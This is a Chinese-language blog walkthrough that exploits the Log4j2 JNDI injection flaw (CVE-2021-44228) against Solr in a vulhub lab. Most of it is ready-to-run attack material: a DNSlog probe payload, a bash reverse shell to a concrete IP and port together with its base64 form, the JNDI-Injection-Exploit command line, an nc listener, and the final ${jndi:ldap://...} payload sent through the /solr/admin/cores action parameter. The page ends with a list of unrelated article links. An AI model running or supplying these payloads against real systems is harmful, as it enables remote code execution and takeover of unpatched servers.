当前位置: 首页 > article >正文

Log4j2漏洞

第一步:搭建靶场环境

#开启环境
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

来到网站首页

第二步:搭建一个dnslog平台上获取我们注入的效果

第三步:发现 /solr/admin/cores?action= 这里有个参数可以传

我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的 版本号

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.kq25rl.dnslog.cn}

第四步:开始反弹shell

#需要用到一个工具JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
#安装java
yum install java
#反弹shell
bash -i >& /dev/tcp/[IP]/[端口] 0>&1
bash -i >& /dev/tcp/8.155.7.133/8888 0>&1
#反弹shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=
#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
#最终命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.155.7.133"
#注释
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。

第五步:进行JNDI注入

#新建终端并开启服务器监听
nc -lvvp 8888

第六步:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址

/solr/admin/cores?action=${jndi:ldap://8.155.7.133:1389/1niv1a}
${jndi:ldap://8.155.7.133:1389/1niv1a}

看到已经访问进来了

去监听端口的页面成功反弹Shell


http://www.kler.cn/a/451014.html

相关文章:

  • EasyExcel 模板+公式填充
  • Ubuntu下ESP32-IDF开发环境搭建
  • golang , chan学习
  • 【项目实战】NGINX 实现会话保持
  • Rasa框架的优点和缺点
  • 重塑数字文档处理:TX Text Control的2024年里程碑
  • Linux 中 grep、sed、awk 命令
  • 某名校考研自命题C++程序设计——近10年真题汇总(下)
  • 了解Hadoop
  • 【PCIe 总线及设备入门学习专栏 1.1 -- PCIe 基础知识 lane和link介绍】
  • JVM的垃圾回收机制GC
  • 面试基础篇---迭代器,yield, tcp, 等
  • C调用gnuplot绘图的方法
  • 【ROS2】坐标TF变换工具-tf2_ros
  • 鸿蒙元服务从0到上架【第三篇】(第二招有捷径)
  • tortoisegit推送失败
  • ubuntu下 如何将 NVIDIA 内核驱动 升级到特定版本 如550.127
  • 大语言模型学习工具及资源总结和落地应用
  • soular使用教程
  • ONNX 转 TensorRT Bug 记录:IIfConditionalOutputLayer
  • 鸿蒙-什么是ArkTS
  • 【C++】模板与泛型编程(一):定义模板,类模板
  • vue3 + MapTalks实现2.5D地图的绘制
  • SQL Server数据库多主模式解决方案
  • 面试小札:Java后端闪电五连鞭_11
  • prometheus监控windows主机